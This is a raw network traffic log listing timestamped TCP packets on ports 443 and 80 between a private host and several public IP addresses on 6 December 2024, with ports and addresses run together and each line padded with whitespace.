                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.288254976 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.288295984 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.300688028 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.300709009 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.300795078 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.300807953 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.300862074 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.304260015 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.304275036 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.304349899 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.304356098 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.304397106 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.315157890 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.315177917 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.315284014 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.315294027 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.315437078 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.321140051 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.321161985 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.321227074 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.321233988 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.321290016 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.329570055 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.329591036 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.329672098 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.329680920 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.329726934 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.339075089 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.339092016 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.339163065 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.339169979 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.339211941 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.348020077 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.348042965 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.348099947 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.348123074 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.348169088 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.357568979 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.357585907 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.357664108 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.357670069 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.357712984 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363575935 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363607883 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363667965 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363678932 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363738060 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.363745928 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378007889 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378041983 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378091097 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378097057 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378113985 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.378143072 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380584002 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380606890 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380652905 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380661011 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380722046 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.380722046 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.392988920 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.393008947 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.393073082 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.393076897 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.393126965 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.396791935 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.396816015 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.396857023 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.396863937 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.396940947 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.404040098 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.405924082 CET4434973118.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415395975 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415414095 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415469885 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415477037 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415519953 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.415519953 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416351080 CET4434973118.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416407108 CET4434973118.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416429996 CET49731443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416450977 CET4434973118.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416465044 CET49731443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416762114 CET49731443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416829109 CET4434973118.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.416888952 CET49731443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435923100 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435935974 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435955048 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435961962 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435973883 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.435976028 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.436006069 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.436017990 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.436017990 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.436024904 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.436048985 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456381083 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456403017 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456469059 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456479073 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456512928 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.456532001 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.478676081 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.478708029 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.478754997 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.478760958 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.478806973 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.488755941 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.488774061 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.488843918 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.488857985 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.488950968 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.489926100 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491673946 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491700888 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491787910 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491787910 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491805077 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.492151022 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.503997087 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504014015 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504014015 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504034996 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504086018 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504092932 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504122972 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504132032 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504148960 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504179955 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.504179955 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.508749008 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.508841038 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.513494015 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.513575077 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515515089 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515535116 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515634060 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515634060 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515647888 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.515748978 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527489901 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527508974 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527554989 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527565956 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527586937 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.527610064 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528449059 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528474092 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528534889 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528544903 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528551102 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.528662920 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538710117 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538727999 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538784027 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538790941 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538826942 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.538858891 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539650917 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539669991 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539710999 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539720058 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539778948 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.539778948 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552112103 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552150011 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552167892 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552180052 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552185059 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552195072 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552212000 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552263021 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552269936 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552280903 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552280903 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552310944 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552763939 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.552773952 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560327053 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560349941 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560435057 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560435057 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560444117 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.560523987 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.574894905 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.574917078 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.574986935 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.574995041 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.575048923 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.575088978 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598433971 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598445892 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598473072 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598489046 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598503113 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598525047 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.598562956 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691279888 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691293001 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691327095 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691349983 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691349983 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691370010 CET4434973018.165.220.24192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691395998 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.691414118 CET49730443192.168.2.1618.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.697340965 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.697366953 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.697529078 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.697818995 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.697832108 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.783155918 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.791937113 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.791950941 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.791985989 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.792037010 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.792061090 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.792090893 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.792114973 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799349070 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799367905 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799417973 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799429893 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799469948 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.799480915 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.804939032 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806770086 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806792021 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806849003 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806864977 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806905985 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.806915998 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.813343048 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.813359976 CET44349727151.101.2.152192.168.2.16
